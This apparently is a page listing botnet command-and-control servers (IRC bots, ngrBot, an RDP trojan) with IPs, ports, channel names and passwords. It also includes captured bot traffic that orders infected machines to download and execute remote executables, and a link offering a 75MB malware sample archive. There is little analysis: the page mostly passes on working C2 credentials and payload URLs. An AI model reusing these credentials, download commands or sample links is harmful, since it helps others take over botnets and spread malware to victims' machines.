Remote Host Port Number 199.101.133.68 80 199.15.234.7 80 70.38.98.238 80 46.17.96.36 1888 PASS strike PRIVMSG #xp :[d=”http://img104.herosh.com/2011/10/21/2578445.gif” s=”81920 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data2.exe” – Download retries: 0 NICK n{US|XPa}eddkvsd USER eddkvsd 0 0 :eddkvsd JOIN #asdf strike JOIN #XP JOIN #US PRIVMSG #xp :[d=”http://dc440.4shared.com/download/bSZjbmUZ/sfgdfsd966.exe” s=”167936 bytes”] Updated bot file “C:Documents and SettingsUserNameApplication DataScxaxs.exe”Read more...
64.31.42.67(ngrBot hosted in United States Limestone Networks Inc)
Remote Host Port Number 199.15.234.7 80 64.31.42.67 1863 PASS secret NICK n{US|XPa}ekxhwua USER ekxhwua 0 0 :ekxhwua JOIN #bots priv8s hosting infos: http://whois.domaintools.com/64.31.42.67
forum.07a.su(irc botnet hosted in Russian Federation Moscow Oao Webalta)
Remote Host Port Number 83.137.194.30 80 92.241.168.221:6789 ircd here 92.241.169.165:6789 ircd here Resolved : [forum.07a.su] To [92.241.168.221] Resolved : [forum.07a.su] To [92.241.169.165] NICK [N00_USA_XP_0727651]x MODE ##im -ix USER SP2-465 * 0 :COMPUTERNAME MODE [N00_USA_XP_0727651]x A -ix JOIN ##im PRIVMSG #xxs :HTTP SET hxxp://whiteforum1.com/fud.exe NICK [N00_USA_XP_3168281]x PRIVMSG #xxs :HTTP SET hxxp://bisp.gov.pk/203.exe PRIVMSG [N00_USA_XP_3168 @ :download; FileRead more...
75mb malware samples
75MB malware files for analysis(gbot,ngrBot,banking trojans) have fun Download: http://2926db4c.ultrafiles.net
irc.sxe-injected.com(300 linux bots hosted in Argentina Buenos Aires Localhost S.a)
server:irc.sxe-injected.com port:6667 chan:#magno321 password:lol123 hosting infos: http://whois.domaintools.com/200.43.192.219
74.208.164.167(irc botnet hosted in United States Miami 1&1 Internet Inc)
Remote Host Port Number 204.0.5.50 80 204.0.5.58 80 216.178.38.224 80 63.135.80.46 80 72.21.91.19 80 74.125.47.100 80 74.208.164.167 1234 PASS xxx NICK NEW-[USA|00|P|21899] USER XP-0708 * 0 :COMPUTERNAME NICK [USA|00|P|65504] USER XP-6261 * 0 :COMPUTERNAME NICK [USA|00|P|68249] USER XP-7577 * 0 :COMPUTERNAME NICK [USA|00|P|47739] USER XP-7950 * 0 :COMPUTERNAME I have 748 clients and 1 serversRead more...
88.86.119.55(irc botnet hosted in Czech Republic Supernetwork S.r.o)
Remote Host Port Number 88.86.119.55 4244 PASS BIG NICK new[iRooT-XP-USA]036409 USER 0364 “” “TsGh” :0364 JOIN #N# BIG PONG :irc.akanska.com hosting infos: http://whois.domaintools.com/88.86.119.55
91.121.243.240(RDP trojan hosted in Spain Granada Ovh Systems)
Remote Host Port Number 82.192.87.164 80 91.121.243.240 3389 The data identified by the following URL was then requested from the remote web server: http://tmrace.net/v5/v5.php?action=logout exe file: http://c442cbf8.tubeviral.com hosting infos: http://whois.domaintools.com/91.121.243.240
92.241.165.124(irc botnet hosted in Russian Federation Moscow Oao Webalta)
Remote Host Port Number 212.7.214.59 80 216.178.38.224 80 63.135.80.46 80 72.21.91.19 80 92.241.165.124 1234 PASS xxx NICK NEW-[USA|00|P|01507] USER XP-5713 * 0 :COMPUTERNAME MODE NEW-[USA|00|P|01507] -ix JOIN #!nw! test PONG 22 MOTD text file used to give cmd’s to bots index.txt: http://ef8488f8.tubeviral.com hosting infos: http://whois.domaintools.com/92.241.165.124
222.88.205.215(ngrBot hosted in China Henan Chinanet Henan Province Network)
Remote Host Port Number 199.15.234.7 80 66.45.56.124 80 69.71.57.254 80 70.38.98.238 80 222.88.205.215 5101 PASS hax0r PRIVMSG #% :[Visit]: Visited “http://g.1click.im/fY” PRIVMSG #p– :[d=”http://img104.herosh.com/2011/10/16/876345700.gif” s=”229376 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data1.tmp” – Download retries: 0 hosting infos: http://whois.domaintools.com/222.88.205.215